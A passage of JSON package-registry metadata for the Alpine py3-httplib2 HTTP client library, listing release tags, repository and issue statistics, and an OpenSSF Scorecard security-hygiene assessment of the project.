hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:58:08.781Z","dependent_packages_count":5,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.674525653980015,"stargazers_count":10.766812619288201,"forks_count":6.882227461547099,"average":6.080891433703829},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.17","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":184,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T06:32:22.390Z","updated_at":"2023-02-01T06:32:22.390Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.17","url":"https://pkgs.alpinelinux.org/packages?branch=v3.17","ecosystem":"alpine","default":false,"packages_count":17817,"maintainers_count":352,"namespaces_count":2,"keywords_count":3375,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1065},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.642Z","updated_at":"2026-08-25T05:07:20.502Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/namespaces"}},{"id":6223539,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2020-05-21T07:26:19.000Z","latest_release_published_at":"2020-05-21T07:26:19.000Z","latest_release_number":"0.18.1-r0","last_synced_at":"2026-03-08T18:25:27.966Z","created_at":"2023-02-01T03:53:28.520Z","updated_at":"2026-08-21T12:54:59.076Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.12/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":511,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-14T10:56:27.493Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-14T08:37:00.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed 